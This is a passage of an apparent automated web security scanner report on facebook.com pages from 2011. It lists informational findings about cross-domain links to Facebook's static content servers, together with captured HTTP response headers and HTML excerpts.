href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/2oTj9mwQeS-.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/sobEsVhahXR.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/OFPuB9qmfib.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/K_RxgTvVokq.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/V-zkfHT8CXb.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/ubbnH6M9ljE.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/NE1qNsIIHmi.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/msTi-EL7vCK.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/j6Y0USeru-T.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/r0jm6f8JtY2.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/SYIMzW6wi61.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/x_JdY7BNW9-.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/Rgx_Vz7nSNo.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/DZLa1PZIieN.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/Ci-JcEcsrg9.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/HHkUms5lcpx.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/z_rHQCDmDDh.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/FnGB7tUxwE3.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/O4MC2pFJMzJ.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Dg8YLPWKyk7.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/ur_c5XpT6zc.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/Mb-ySEi3O0b.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/erCj3jAAsca.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/Trz9qEKGISz.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PzNsk8U51ji.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/otNsMnT3Ccb.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/-hUG5Dc8o3Z.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/POIirpFgl5q.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/qirUjHNG9oJ.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/sdwD1rGJXK2.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/hkM0mPGHIE1.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/uYvCnbsceoH.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/Bqaiy6eGUJa.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/HTDWQBuWGI8.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/zpzCcjhbyCZ.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/zOMloODzDF_.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/_J12hr-nH-4.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/DiI7ZwzsMWE.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/c6emPCFfPcn.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/heGhkAidtX0.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/PVBa_VtP99O.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/7f4SE3bv4B2.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yA/r/C9intiNq_3N.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/4F3Iv5NBJOL.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/vTlzK_6DGwe.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/sHCa4y3LzLj.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/rrdmptIcoxd.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/Q3Oe8zcURw5.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/KdKjGooM6-s.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/edfMk-9nmKj.css" /></head>
...[SNIP]...

20.63. http://www.facebook.com/ajax/prefetch.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/prefetch.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/EX2d6_qWW-3.css
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css
http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/VXhD5_PgFOo.css
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/-Ho_EIT75He.css
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/FUYS70vIS4_.css
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/gQh69rr8JBH.css
http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/Kc1c3lfdICw.css
http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/wAZMHdyxy_L.css
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/PPCATkRjgbb.css
http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/6gpjXzvXDSF.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css

Request

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=31536000
Content-Type: text/html;charset=utf-8
Expires: Wed, 18 Jul 2012 14:59:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.62.99.45
X-Cnection: close
Date: Tue, 19 Jul 2011 14:59:00 GMT
Content-Length: 1414

<!DOCTYPE html><html><head><script>document.domain = 'facebook.com';</script><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/VXhD5_PgFOo.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/wAZMHdyxy_L.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/6gpjXzvXDSF.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/-Ho_EIT75He.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/FUYS70vIS4_.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/PPCATkRjgbb.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/EX2d6_qWW-3.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/Kc1c3lfdICw.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/gQh69rr8JBH.css" /></head>
...[SNIP]...

20.64. http://www.facebook.com/badges/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/badges/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/badges/?ref=pf

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/gh8wxcAgNvK.css
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/d3jsdgznlXU.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/aBJXPgldonq.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

20.65. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/careers/?ref=pf

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/H9wnMF3Lri6.css
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css
http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/BDfYGSOIQq_.css
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/rA11fLEN3pu.png
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PTQolaY4o54.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/sHCa4y3LzLj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/dNZ8lADSyV5.png
http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/8KSjR8nTFnM.png
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/VLLIdFco_FS.png
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/64Qw6hJnpsg.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/p2EQhKqozYb.png
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/BmRBrG86u58.png
http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/OlBs86PzVAS.png
http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/h_raeRCe0vp.png
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/IQqCjk5NiJN.png
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/N5R94dW584a.png
http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/KDo2iiCy_gr.png
http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/MoxBq-TLXDr.jpg
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.121.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:50 GMT
Content-Length: 20897

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/careers\/index.php";window._EagleEyeSeed="Ikcl";</script>
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PTQolaY4o54.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/BDfYGSOIQq_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/sHCa4y3LzLj.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/H9wnMF3Lri6.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div id="home_welcome"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/MoxBq-TLXDr.jpg" alt="" /><div class="home_header_description">
...[SNIP]...
<a href="/careers/department.php?dept=engineering"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/8KSjR8nTFnM.png" class="careers_dept_img" title="Software Engineering" alt="Software Engineering" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=legal"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/IQqCjk5NiJN.png" class="careers_dept_img" title="Legal, Finance, Facilities & Admin" alt="Legal, Finance, Facilities & Admin" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=communications"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/64Qw6hJnpsg.png" class="careers_dept_img" title="Communications & Public Policy" alt="Communications & Public Policy" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=product-management"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/BmRBrG86u58.png" class="careers_dept_img" title="Product Management" alt="Product Management" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=IT"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/KDo2iiCy_gr.png" class="careers_dept_img" title="IT & Security" alt="IT & Security" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=hr"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/dNZ8lADSyV5.png" class="careers_dept_img" title="HR & Recruiting" alt="HR & Recruiting" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=design"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/OlBs86PzVAS.png" class="careers_dept_img" title="Design & User Experience" alt="Design & User Experience" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=tech-ops"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/p2EQhKqozYb.png" class="careers_dept_img" title="Technical Operations" alt="Technical Operations" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=growth"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/VLLIdFco_FS.png" class="careers_dept_img" title="Growth & Internationalization" alt="Growth & Internationalization" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=sales"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/rA11fLEN3pu.png" class="careers_dept_img" title="Sales & Business Development" alt="Sales & Business Development" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=online-ops"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/h_raeRCe0vp.png" class="careers_dept_img" title="Online Operations" alt="Online Operations" /></a>
...[SNIP]...
<a href="/careers/department.php?dept=platform"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/N5R94dW584a.png" class="careers_dept_img" title="Platform & Product Marketing" alt="Platform & Product Marketing" /></a>
...[SNIP]...

20.66. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/find-friends?ref=pf

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/EX2d6_qWW-3.css
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/08tONxelrvf.css
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/V-zkfHT8CXb.css
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/rwkuDRWV9jd.css
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/sobEsVhahXR.css
http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/rSJeTgoHNUS.css
http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/2oTj9mwQeS-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/ur_c5XpT6zc.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif
http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/K_RxgTvVokq.css
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/OFPuB9qmfib.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.95.36
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:28 GMT
Content-Length: 104185

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/vanityurl.php";window._EagleEyeSeed="ZSxE";</script><nosc
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/2oTj9mwQeS-.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/K_RxgTvVokq.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/rwkuDRWV9jd.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/sobEsVhahXR.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/OFPuB9qmfib.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/EX2d6_qWW-3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/V-zkfHT8CXb.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/08tONxelrvf.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/ur_c5XpT6zc.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/rSJeTgoHNUS.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...
</label><img class="mts mls uiLoadingIndicatorAsync img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></div>
...[SNIP]...

20.67. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/help/?ref=pf

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/q30FbKmaBid.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.123.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 22399

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="af0Z";</script><noscript>
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/q30FbKmaBid.css" />
